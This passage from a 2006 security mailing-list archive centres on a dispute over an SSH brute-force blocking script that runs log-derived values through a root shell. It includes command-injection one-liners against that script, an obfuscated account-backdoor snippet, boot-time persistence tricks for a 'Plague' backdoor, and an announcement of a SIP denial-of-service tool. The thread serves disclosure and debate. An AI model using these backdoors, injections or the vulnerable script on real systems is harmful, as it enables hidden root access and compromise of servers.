hacking)
then print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 
22 -j REJECT

$1 = IP address
$ifaddr = IP address of the interface

/
echo Copying sharpener to /usr/local/bin
sed -n '1,67p' ./sharpener  /usr/local/bin/sharpener
echo fi  /usr/local/bin/sharpener
rm ./sharpener
/

Here goes the voodoo... You ready?

print lines from 1 through 67 of this same file but put it in 
/usr/local/sharpener

add a fi to that same file then remove the original

/
sleep 2
echo 
echo Adding Sharpener to cron
echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener

if [ -e /var/spool/cron/root ]

   then
echo 0,10,20,30,40,50 * * * * 
/usr/local/bin/sharpener  /var/spool/cron/root


else
if [ -e /var/cron/tabs/root ]

   then
   echo 0,10,20,30,40,50 * * * * /usr/local/bin/sharpener 
 /var/cron/tabs/root


   fi
fi

/

Add it to cron


/

awk '!/192.168/ 
!/127./ 
!/#/ 
!/172.32/{print $1 has been blocked via SSH}' /etc/hosts.deny |\

mail -s Sharpener [EMAIL PROTECTED]

fi
/

Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, 
and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically 
into your machine.


Right.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  

Tavis Ormandy wrote:


Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

 
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru  
/tmp/hosts.deny



insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh error retrieving@localhost  ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.
  


So again dumbass...

Look at the script. Although YOU'RE opening /var/log/authlog what is the 
script opening. Please tell me you're really not that stupid. And if 
someone else decided to modify this script, what does that have to do 
with what I posted. How exactly is my script a backdoor as you claim. 
Enquiring minds want to know this since you claim its a backdoor. Please 
tell me outside of your modification how this is going to backdoor someone.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)



Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

  

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru  
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./  //{print $2}'  
/etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in 
/etc/hosts.deny

into /etc/hosts.deny



What will be in column 13 when Tavis does this:

  

Tavis Ormandy wrote:


Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
  


Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.
  


Jesus christ people get stupider by the moment. W/e the script is there 
for scrutiny there is no hidden voodoo. If you DO want to see hidden 
voodoo here it is,,,



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
  
Since you seem to be clueless I'll answer step by step. Here goes idiot. 
(Sinful to see someone so clueless coming from Gentoo... Guess it goes 
with the romper room Linux territory)



Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

  

/
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru  
/tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./  //{print $2}'  
/etc/hosts.deny

/

There is no hocus pocus here. Look at /var/log/secure and fine the term
error retrieving and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in 
/etc/hosts.deny

into /etc/hosts.deny



What will be in column 13 when Tavis does this:

  

Tavis Ormandy wrote:


Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
  


Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.

  


Here is your voodoo backdoor moron

file=`awk 'NR==59 {gsub(//,);print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F : 
'BEGIN{OFS=:}{$1=test}1{$2=\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1}2' 
 $file

file2=`awk 'NR==74 {gsub(/,/,);print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/'  $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, //){print $4}'`
$what|$who full-disclosure@lists.grok.org.uk


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:


I'm not sure what you mean by modification, I simply subsituted the name
for the logfile I use.

Thanks, Tavis.

  
So for the third time now. Explain to me how I am backdooring someone's 
system.


[EMAIL PROTECTED] include]# uname -a
Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686 
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}' 
/var/log/secure|sort -ru

222.171.20.252
211.137.74.58

My logs parse out addresses not named and there is no redirection going 
on. If you want to say Hey... It should be written as such then gladly 
do so. But posting hey you're backdooring the planet like a jackass is 
moronic. Line by line on my machines it does what it needs to do and it 
does so just fine. Did you see any notes of Gentoo on the comments? I 
didn't because I don't use it, never have, don't care to. So if it does 
something different on Gentoo, let's use the brain for a moment... Gee 
this works horrible on Gentoo. The author is a shitty writer... I think 
I should let him know as opposed to Oh my gawd he's backdooring you.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams





smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Tavis Ormandy wrote:

On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
  

Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.



Gabriel, I was referring to this line:

awk '!/#/  /\./  !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/  !/#/  !/-s  -i/'|sh

(note the |sh), $1 can be controlled by specially crafted attempted
logins.

Thanks, Tavis.

  


That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you supposed it would be possible for someone to insert 0wn3ed or any 
other variable outside of an IP address?


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.

  
No it can't. Even if it was rm -rf someone placed in, did you not notice 
my grep statement? Only print items with a decimal. At no given point 
anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would 
there be an option for someone to craft anything...


FreeBSD
-bash2-2.05b$ uname -a
FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: 
Thu May 11 01:34:54 CDT 2006 
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS  i386

-bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
57354
57340
57335
56253
55125
49211
40334
37188
3508
33875
33635
33454
32798
3137
2895
2638
2408
2301
2114
-

OpenBSD
# uname -a
OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
# awk '{print $13}' /var/log/authlog|grep \.|sort -ru
63.243.158.221
61.129.85.230
220.132.113.163
219.149.211.49
213.195.75.41
206.210.96.56


I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.

  
This should have been stated to the list as opposed to You're 
backdooring people



I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.
  

I'll give you addresses if you'd like to take a shot at it.


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote:
  
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you supposed it would be possible for someone to insert 0wn3ed or any 
other variable outside of an IP address?



That's impossible.

Putting extra spaces in the log entry is easy.

  
And extra spaces would do what... If the point is to insert a name 
someone in order to send out information from the 13th column in 
authlog, then I'll tell you what, you name the system it can happen on 
and I will personally apologize publicly. It is not doable. I'd have a 
better chance of hanging with Santa while I bang Angelina Jolie while 
Denise Richards watches me.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread J. Oquendo

Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do 
you supposed it would be possible for someone to insert 0wn3ed or any 
other variable outside of an IP address?



Remember the (in)famous quote ...that vulnerability is purely 
theoretical...?


I think the point is you don't use $language to split a bunch of fields, 
and then pipe them back through /bin/sh without making sure they're not 
malicious.


Doesn't matter that you can't think of a way to make them malicious .. 
somebody else will find one. It's safer to just assume it'll happen and 
always sanitize variables before you {do_stuff;} with them.


(my $0.02)

~Mike.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  
So I ask you too... Find me any Unix derivative that will allow someone 
to pass a name, word, place, etc into the 13th column of authlog, then 
bypass grep which is grep'ing out for decimals.



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] DoS kiddiots can face 10 years in jail

2006-11-13 Thread J. Oquendo

[forwarded]

Denial of service attackers face 10 years in jail 


http://www.zdnetasia.com/news/security/0,39044215,61966964,00.htm

By Andy McCue
Special to ZDNet Asia
November 13 2006 

Denial of service attackers in the United Kingdom now face up to 10 
years in jail with updated computer crime laws coming into force this 
week as part of the new Police and Justice Act 2006.


The long-overdue updating of the 1990 Computer Misuse Act also increases

the sentence for hacking a computer from a maximum of six months to two 
years' imprisonment.


Section three of the 1990 CMA is replaced by section 34 of the Police 
and Justice Act 2006, which now more explicitly covers denial of service


attacks as unauthorized acts with intent to impair operation of a 
computer.


The act says a person is guilty of an offence if at the time of any 
attack they have the intent to impair the operation of any computer, 
prevent or hinder access to any program or data held on a computer, or 
impair the operation of a program or the reliability of data.


Confusion had arisen over whether denial of service attacks were covered

in the original CMA in the case of a teenager originally cleared in 2005

of crashing the email server of his former employer by overwhelming it 
with an 'email bomb' containing millions of messages.


That ruling was later overturned and David Lennon was found guilty 
earlier this year of breaking the CMA, and was sentenced to a two-month 
curfew.


The new law also makes it an offence to supply or make available any 
software or tools that could be used to commit hacking or denial of 
service attacks, and those found guilty under this section of the act 
face up to two years in jail.


As part of the Police and Justice Act 2006 the police IT organization 
Pito has been abolished and its functions will be taken over by the new 
National Policing Improvement Agency.


New powers under the Act will give police the right to access passenger 
and crew data on any journeys within the United Kingdom or arriving in 
the United Kingdom.


Andy McCue of Silicon.com reported from London.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Locking down (L)AMP from XSSKiddiots

2006-11-10 Thread J. Oquendo

I was bored...

www.infiltrated.net/modsecips.html

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Asterisk Local and Remote Denial of Service Vulnerability

2006-10-30 Thread J. Oquendo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Product: Asterisk Open Source PBX
Impact: Multiple Local and Remote Denials of Service
Version(s): All versions prior to 1.2.13
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Asterisk is an Open Source PBX which runs on Linux, BSD, Solaris and MacOSX 
that provides all of
the features in a standard PBX. Asterisk does voice over IP and can 
interoperate with almost all
telephony equipment.

II. DESCRIPTION
A sequence of malformed (pre-defined) packets can cause different denial of 
services on Asterisk.
The attack is both local and remote. These denial of services can range from 
the Asterisk server
shutting down, channels being opened and filling up queues. Log file denials of 
service by filling
space with errors and ranDumb messages. Voicemail space allocation being 
filled, and ICMP denials
of service.

III SOLUTION
Versions 1.2.13 and greater are no longer vulnerable to the attack and users 
are urged to update
to 1.2.13 or better.

IV. SOURCE
http://www.infiltrated.net/asteroid/asteroidv1.tar.gz

V. POSSIBILITIES
While the initial packet creation tool was tested on Asterisk, it was not 
targeted towards Asterisk
but at the SIP protocol. Asterisk was used merely for Wireshark packet captures 
in order to re-create
newer packets. The Asteroid SIP denial of service tool could also affect other 
products that run the
SIP protocol including soft phones, other PBX's, etc.

VI. MENTIONS
Thanks to Kevin P. Flemming and the guys at Asterisk fixing this promptly. Dan 
York for getting people
to pay attention. Tim Donahue for his Perl pointers, vgersh99 (aka vlad) for 
nawk pointers, PHV,
Annihilannic, p5wizard, Anthony LaMantia, Tzafir Cohen, and the others on the 
Asterisk-Dev list.

VII. TESTBED
Tested on Solaris, FreeBSD, Linux (SuSE, CentOS, Gentoo, Debian) distributions 
running various versions
Asterisk.

VIII. CHECKSUMS

$ md5 asteroidv1.tar.gz 
MD5 (asteroidv1.tar.gz) = b32c56ab4004d2a75109d9e8d824

$ sha1 asteroidv1.tar.gz 
SHA1 (asteroidv1.tar.gz) = 0345fc7e423bddb8d9aa5fae431c0715db70a879



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFFRnM0h3J3NhODp0MRAu0NAJsFLdCKJgRqtjLs35GtXxRKNYNaLgCg8xxI
zZUQr4YWe0BE8RHpvEYTyEI=
=TLzd
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Asteroid SIP Denial of Service Tool

2006-10-28 Thread J. Oquendo
Asteroid is a SIP denial of service attack tools which affected older versions
of Asterisk the Open Source PBX and may affect other products running the SIP
protocol. There are thousands of custom (mis)crafted SIP packets which were
sent to a older versions of Asterisk that caused errors stopping Asterisk.

The packets were crafted based on packetdumps from Wireshark with flags set for
pseudo-spoofing, ranDUMBized extensions, etc.. The purpose of the tool was to
help me understand SIP security and Denials of Service attacks on the SIP
protocol. Originally I had intended on testing out my nCite Session Border
Controller but after watching nCite crash and burn on its own, it made little
sense for me to point it at it.

I have found that by sending a certain sequence of these packets, in a certain
order, servers react differently. Sometimes it crashed faster, sometimes more
extensions subscribed, sometimes voicemails were created and the list went on.
Asterisk version 1.2.13 and better are now patched from this issue but there
are other products it has not been tested on.

The packets were butchered in Perl and called from a shell script since I had
to manipulate packet sequences individually. This Proof of Concept program is
released to the public under the hopes that individuals will find a useful
purpose for assessing DoS vulnerabilities. It is unfortunate though that there
are idiots who will use this lame tool for malicious purposes.

Some vendors, CERT and other organizations were contacted as early as September
9th 2006 to address issues with their products. Most reacted quickly to get the
fixes in order.  Thanks to Kevin P. Flemming and the guys on Asterisk Dev for
creating a thread on this. Dan York for getting some to pay attention. PSIRT
at Cisco for looking into this, Tim Donahue for his perl pointers, vgersh99
(aka vlad) for nawk foo pointers, PHV, Annihilannic, p5wizard (segment!), and
Henning Schulzrinne for taking a look at the tool during his seminars at
Columbia.

Also thanks to Anthony LaMantia, Tzafir Cohen, and the others on the dev list
for tolerating my posts. Public apologies to Jay R. Ashworth for my mis-reading
of the (Missed)Trust in Caller ID thread on VOIPSA ;)

Coming 10/31/2006
http://www.infiltrated.net/asteroid/


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Plague re-visited

2006-10-23 Thread J. Oquendo
[EMAIL PROTECTED] wrote:
 Hello Rik,
 and how on earth can you make root run that piece of code? Do you have
 to specify it in the README section that it is mandatory to run that as
 root in order the new application root will be installing to run as
 expected?


If you need someone to spell out how this works and how it maintains an account 
then you should unsubscribe from all security lists and search google for 
pokemon, change your hobby, get out of this field. From the onset nothing 
specified remote root access it stated proof of concept BACKDOOR if you 
need the term defined for you, re-read the previous sentence in its entirety.

 Indeed, it is hard to tell what it actually does... unless you open your
 eyes and see sed 's/root/something/g' somewhere.


The purpose of me pondering this was a notion that one doesn't always need to 
re-invent the wheel. Using standard commands, its actually easier and safer to 
maintain a backdoor. If someone already rooted a machine, how does one maintain 
that account without setting off bells and whistles. It's alot easier to whip 
up little bits and pieces and have it precompile into one script, run itself, 
and delete itself afterwards. There would be no trace of any all inclusive 
backdoor programs. A snippet here, a snippet there all precompiling either on a 
system startup or shutdown.

 Either way, installing from hundreds of source files, can make even the
 best sys admin to not notice that part of the source code of the
 BACKDOOR-contagious application!


Really... Most system administrators don't even pay attention to log files. 
Most system administrators are so caught up with every work, putting out fires, 
configuring and maintaining systems they don't have time to check a 500gb drive 
for a backdoor, and when they do, they're doing what running chkrootkit. Using 
a method such as the one I described makes it much more difficult to detect a 
backdoor. As for seeing the word root and raising a red flag, don't make me 
laugh, see lines 2 and 4 below... Let's start in /etc/rc3.d...

echo file=`awk 'NR==59 {gsub(//,);print \$3}' /usr/include/paths.h`   
K1firstfile
echo echo sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/'  $file   
   K2nextfile
echo file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`  K3anotherfile
echo sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/''  $file2  
K4endingfile
echo rm $file1 $file2  K5lastfileremove

Where one file depends on the next and so on and so forth. At the end of it all 
the backdoor files are removed, yet on startup (or shutdown depending on how 
its written), files are re-compiled and the account is recreated. The problem I 
see with many administrators and users nowadays, are they're not totally clued 
in... So you see file=`awk 'NR==59 {gsub(//,);print \$3}' 
/usr/include/paths.h` ... Unless you have K1firstfile checksummed, most 
wouldn't give it a second look.

 bad PLAGUE! bad intentions! bad people possibly putting that where root is
 messing.


I hope that comment was sarcasm and not stupidity...


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Plague Proof of Concept Linux backdoor

2006-10-21 Thread J. Oquendo

Plague is an odd proof of concept backdoor keeping
tool based on the premise of using existing system
files and commands to keep and maintain a backdoor
on Linux systems. I could have modified this for
BSD, Solaris, etc., but I didn't feel like doing
the work...

http://www.infiltrated.net/plague


-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743

How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Hacker Pumpking Carving Contest

2006-10-17 Thread J. Oquendo

RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as 
possible with as few emails as possible.  It's time to get in the 
spirit.  It's time for a hacker pumpkin carving contest.  I've given you 
two weeks notice so no one can complain about not hearing about it in 
time.  Info at the following URL: http://ha.ckers.org/hacker-pumpkins/


-RSnake

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  

Does this count?
lynx -dump http://infiltrated.net/foo|awk '{a[i++]=$0} END {for (j=i-1; 
j=0;) print a[j--] }'|sed 's/\$/ /g;s/S/U/g'|awk '!($0 in a) {a[$0];print}'


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacker Pumpking Carving Contest

2006-10-17 Thread J. Oquendo

RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as 
possible with as few emails as possible.  It's time to get in the 
spirit.  It's time for a hacker pumpkin carving contest.  I've given you 
two weeks notice so no one can complain about not hearing about it in 
time.  Info at the following URL: http://ha.ckers.org/hacker-pumpkins/


-RSnake

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  

Uh... Windows (l)users need not apply... Retardo Linux/BSD users try:

lynx -dump http://infiltrated.net/foo|\
awk '{a[i++]=$0} END {for (j=i-1; j=0;) print a[j--] }'|\
sed 's/\$/ /g;s/S/U/g'|\
awk '!($0 in a) {a[$0];print}'


;) Long time Rs

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fallacies on Truths in Caller ID scam

2006-10-09 Thread J. Oquendo

Ajay Pal Singh Atwal wrote:

Getting back to some very small points here...
  
Correction: Rawalpindi is not in India. 

  
Ralwapindi was used cause it's the only place that came to my mind at 
the moment, Pakistan, India it was an example.



If the call is from Dell, then does it matter, if the office is in India or 
Rawalpindi. 1800GO2DELL represents dell.
  
Yes it does matter to me where someone is located when I am speaking to 
them. It matters for the sake of accountability. YOU may not see nothing 
wrong with someone having your information at their fingertips, but I 
want to know who, what, where, when and why someone is doing ANYTHING 
with my information. Or haven't you been following news:


Indian Outsourcing Firms Downplay Fraud Concerns
http://www.crmbuyer.com/story/PZCY8ZqRWY32gK/Indian-Outsourcing-Firms-Downplay-Fraud-Concerns.xhtml

Fraud Reports Worry Indian Outsourcing Firms
http://www.ecommercetimes.com/story/8zIZdp07IuYkrW/Fraud-Reports-Worry-Indian-Outsourcing-Firms.xhtml

etc
http://tinyurl.com/g4mg5

I don't care if its India, China, Pakistan, the North or South Pole, 
Dell in this example should follow US laws especially since they're 
located here. It can't be a single sided law it has to apply to all 
bottom line.



And in that case www.talkety.com is doing something similar from Germany (?). 
And you can misuse their service to have fun making prank calls to people from 
their own numbers.

  
I don't care about Germany there fellow, this post was regarding US LAWS 
and I happened to mention a US COMPANY not a Germany one. Ich scheiß' 
d'rauf! (No really)



Just something for though...


ahem..

  

Next argument?

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 


The happiness of society is the end of government.
John Adams



smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fallacies on Truths in Caller ID scam

2006-10-04 Thread J. Oquendo
Getting back to some points here...

So with let's say a vendor getting back to me on a problem I have, let the 
company be Dell for this example. Dell has their outsourced vendor from 
Ralwapindi India or somewhere in the vicinity call me, my caller ID shows 
1800GO2DELL, in this scenario either way you want to cut it, Dell is 
circumventing the Truth in Caller ID Act. 

As for telco's doing what they do greasing pockets, this has gone down since 
the evolution of business, money talks BS walks bottom line.

Vladis to further iterate on your fallacious point: 

 The prosecutor can charge *each and every person involved* who is both

 a) within the US and
 b) took an identifiable action which lead to the event.

Let's create SpoofmyCallerIDforKicks.com and make a call (abbreviate the site 
to SCK.com for this example):

Spoofer(2125551212) -- SCK.com -- CallReceiver (4085551212)

SCK.com (posts call via Asterisk) -- routes through Russia to Level3 -- 
through Verizon -- through BellSouth -- Victim

SCK is in the Moldovia absolved from US laws. Should BellSouth bear the burden 
of the illegal action? This is what your statement is telling me. BellSouth, 
Verizon and Level3 are all to blame and since they cannot prosecute SCK being 
they're outside of US laws, you're inferring the US government 
can/will/should/have_the_option_to go after those responsible. Either way you 
